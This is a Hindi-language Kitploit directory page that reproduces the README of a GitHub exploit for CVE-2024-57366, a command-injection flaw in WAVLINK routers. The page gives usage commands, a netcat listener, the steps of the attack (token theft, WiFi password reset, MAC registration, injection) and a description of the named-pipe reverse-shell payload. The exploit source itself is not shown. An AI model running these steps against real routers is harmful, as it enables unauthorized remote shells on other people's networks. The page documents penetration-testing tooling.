Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-57366 — CVE-2024-57366 के लिए रिमोट कोड निष्पादन एक्सप्लॉइट जो WAVLINK राउटरों को MAC एड्रेस सत्यापन बायपास और कमांड इंजेक्शन के माध्यम से लक्षित करता है, जिसमें स्वचालित WiFi पंजीकरण और रिवर्स शेल पेलोड डिलीवरी शामिल है। | Kitploit
उपकरण/GitHubGitHub/h4ckusaur/cve-2024-57366
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवायरलेस सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

CVE-2024-57366 के लिए रिमोट कोड निष्पादन एक्सप्लॉइट जो WAVLINK राउटरों को MAC एड्रेस सत्यापन बायपास और कमांड इंजेक्शन के माध्यम से लक्षित करता है, जिसमें स्वचालित WiFi पंजीकरण और रिवर्स शेल पेलोड डिलीवरी शामिल है।

311 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2024-57366 एक्सप्लॉइट

CVE-2024-57366 के लिए एक मजबूत एक्सप्लॉइट जो MAC पता सत्यापन बाईपास और कमांड इंजेक्शन के माध्यम से कमजोर राउटर पर रिमोट कोड निष्पादन की अनुमति देता है।

यह एक पोस्ट-ऑथराइज़ेशन एक्सप्लॉइट है जिसके लिए राउटर की "रिमोट कंट्रोल" सुविधा चालू होनी चाहिए, और प्रशासनिक पासवर्ड आवश्यक है। प्रशासनिक उपयोगकर्ता नाम "admin" पर हार्डकोड किया गया है।

🚀 विशेषताएँ

  • स्वचालित MAC पता पंजीकरण - राउटर के साथ MAC पता पंजीकृत करने के लिए WiFi से कनेक्ट होता है
  • नेटवर्क-संरक्षित एक्सप्लॉइट - एक्सप्लॉइट के दौरान आपके मौजूदा नेटवर्क कनेक्शन बनाए रखता है
  • MAC पता कैशिंग - कैश की गई सफल MAC पतों का उपयोग करके त्वरित पुनरावृत्ति एक्सप्लॉइट
  • BurpSuite-संगत - अधिकतम विश्वसनीयता के लिए सटीक अनुरोध प्रारूप से मेल खाता है
  • टाइमआउट हैंडलिंग - जब रिवर्स शेल कनेक्शन की अपेक्षा होती है तो सहायक संदेश
  • उपयोगकर्ता-अनुकूल - आसान प्रबंधन के लिए सरल टेक्स्ट-आधारित MAC पता कैश

📋 आवश्यकताएँ

  • Python 3.6+
  • वायरलेस एडाप्टर वाला लिनक्स सिस्टम
  • sudo पहुंच (नेटवर्क इंटरफ़ेस प्रबंधन के लिए आवश्यक)
  • CVE-2024-57366 के लिए संवेदनशील लक्ष्य राउटर

🛠️ स्थापना

  1. एक्सप्लॉइट फ़ाइलों को क्लोन या डाउनलोड करें
  2. सुनिश्चित करें कि आपके पास आवश्यक Python पैकेज हैं:
    root@kitploit:~
    pip3 install requests
    

🎯 उपयोग

बुनियादी एक्सप्लॉइट (पहली बार)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

त्वरित एक्सप्लॉइट (कैश की गई MAC का उपयोग करके)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# स्क्रिप्ट पूछेगी: "Use cached MAC for quick exploit? (y/n):" - "y" कहें

पूर्ण एक्सप्लॉइट बलपूर्वक (कैश छोड़ें)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

कैश की गई MAC पतों की सूची दिखाएँ

root@kitploit:~
python3 exploit.py --list-cached

📖 कमांड लाइन विकल्प

  • --target - लक्ष्य राउटर IP पता (डिफ़ॉल्ट: 127.0.0.1)
  • --port - लक्ष्य राउटर पोर्ट (डिफ़ॉल्ट: 80)
  • --local-ip - रिवर्स शेल कॉलबैक के लिए आपका स्थानीय IP पता
  • --local-port - रिवर्स शेल कॉलबैक के लिए स्थानीय पोर्ट (डिफ़ॉल्ट: 4444)
  • --password - राउटर व्यवस्थापक पासवर्ड
  • --ssid - WiFi नेटवर्क नाम (डिफ़ॉल्ट: WAVLINK-Mesh_DC4B)
  • --force-full - पूर्ण एक्सप्लॉइट बलपूर्वक करें, कैश की गई MAC जाँच छोड़ें
  • --list-cached - कैश की गई MAC पतों की सूची दिखाएँ और बाहर निकलें

🔧 यह कैसे काम करता है

तकनीकी अवलोकन

CVE-2024-57366 राउटर फर्मवेयर में MAC पता सत्यापन बाईपास का शोषण करता है। यह भेद्यता /protocol.csp एंडपॉइंट में mac पैरामीटर के माध्यम से कमांड इंजेक्शन की अनुमति देती है।

एक्सप्लॉइट प्रक्रिया

  1. प्रमाणीकरण - राउटर से प्रमाणीकरण टोकन निकालता है
  2. WiFi पासवर्ड रीसेट - राउटर WiFi पासवर्ड को व्यवस्थापक पासवर्ड से मैच करने के लिए रीसेट करता है
  3. MAC पंजीकरण - राउटर के साथ MAC पता पंजीकृत करने के लिए WiFi से कनेक्ट होता है
  4. कमांड इंजेक्शन - पंजीकृत MAC का उपयोग करके रिवर्स शेल पेलोड इंजेक्ट करता है
  5. नेटवर्क संरक्षण - पूरे समय मौजूदा नेटवर्क कनेक्शन बनाए रखता है

मुख्य तकनीकी विवरण

  • MAC सत्यापन बाईपास: राउटर यह जांच कर MAC पतों को मान्य करता है कि वे WiFi से कनेक्ट हुए हैं या नहीं
  • नेटवर्क इंटरफ़ेस बाइंडिंग: मूल नेटवर्क संदर्भ को संरक्षित करने के लिए eth0 इंटरफ़ेस का उपयोग करता है
  • अनुरोध प्रारूप: BurpSuite प्रारूप से बिल्कुल मेल खाता है (index=1, URL पथ में टोकन)
  • पेलोड: विश्वसनीयता के लिए नामित पाइप के साथ Netcat रिवर्स शेल

MAC पता कैशिंग

एक्सप्लॉइट स्वचालित रूप से सफल MAC पतों को successful_macs.txt में कैश करता है:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

मैन्युअल MAC जोड़ना: successful_macs.txt संपादित करें और इस प्रकार पंक्तियाँ जोड़ें:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 उदाहरण उपयोग

पहला एक्सप्लॉइट प्रयास

root@kitploit:~
# netcat लिसनर शुरू करें
nc -lvp 4444

# एक्सप्लॉइट चलाएँ
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# जब MAC पता सहेजने के लिए कहा जाए, तो "y" कहें

बाद के एक्सप्लॉइट (बहुत तेज़)

root@kitploit:~
# netcat लिसनर शुरू करें
nc -lvp 4444

# एक्सप्लॉइट चलाएँ (कैश की गई MAC का उपयोग करेगा)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# जब कैश की गई MAC के बारे में पूछा जाए, तो "y" कहें

🔍 समस्या निवारण

सामान्य समस्याएँ

  1. "कोई वायरलेस एडाप्टर नहीं मिला"

    • सुनिश्चित करें कि आपके पास एक सक्षम वायरलेस एडाप्टर है
    • जाँचें कि WiFi चालू है
    • sudo के साथ चलाने का प्रयास करें
  2. "MAC पता सत्यापन विफल"

    • MAC पता राउटर के साथ पंजीकृत होना चाहिए
    • सुनिश्चित करें कि WiFi कनेक्शन चरण सफलतापूर्वक पूरा हुआ
    • पहले मैन्युअल रूप से WiFi से कनेक्ट करने का प्रयास करें
  3. "अनुरोध समय समाप्त"

    • इसका वास्तव में मतलब यह हो सकता है कि एक्सप्लॉइट काम कर गया!
    • रिवर्स शेल कनेक्शन के लिए अपना netcat लिसनर जाँचें
    • राउटर कमांड निष्पादित कर रहा हो सकता है लेकिन HTTP का जवाब नहीं दे रहा हो
  4. "रिवर्स शेल कनेक्ट नहीं हो रहा"

    • सत्यापित करें कि आपका --local-ip सही है (ip addr show eth0 का उपयोग करें)
    • सुनिश्चित करें कि कोई फ़ायरवॉल कनेक्शन को ब्लॉक नहीं कर रहा है
    • जाँचें कि netcat लिसनर सही पोर्ट पर चल रहा है

नेटवर्क आवश्यकताएँ

  • eth0 इंटरफ़ेस: नेटवर्क संरक्षण के लिए एक IP पता होना चाहिए
  • वायरलेस एडाप्टर: प्रारंभिक MAC पंजीकरण के लिए आवश्यक
  • राउटर पहुँच: eth0 इंटरफ़ेस के माध्यम से राउटर तक पहुँचने में सक्षम होना चाहिए

📁 फ़ाइल संरचना

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Main exploit script
├── successful_macs.txt     # MAC address cache (auto-generated)
└── README.md              # This file

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।

🔗 संदर्भ

  • CVE-2024-57366
  • MAC पता सत्यापन में राउटर फर्मवेयर भेद्यता
  • /protocol.csp एंडपॉइंट के माध्यम से कमांड इंजेक्शन

📝 लाइसेंस

यह परियोजना शैक्षिक उद्देश्यों के लिए यथावत प्रदान की गई है। लागू कानूनों और विनियमों के अनुसार जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें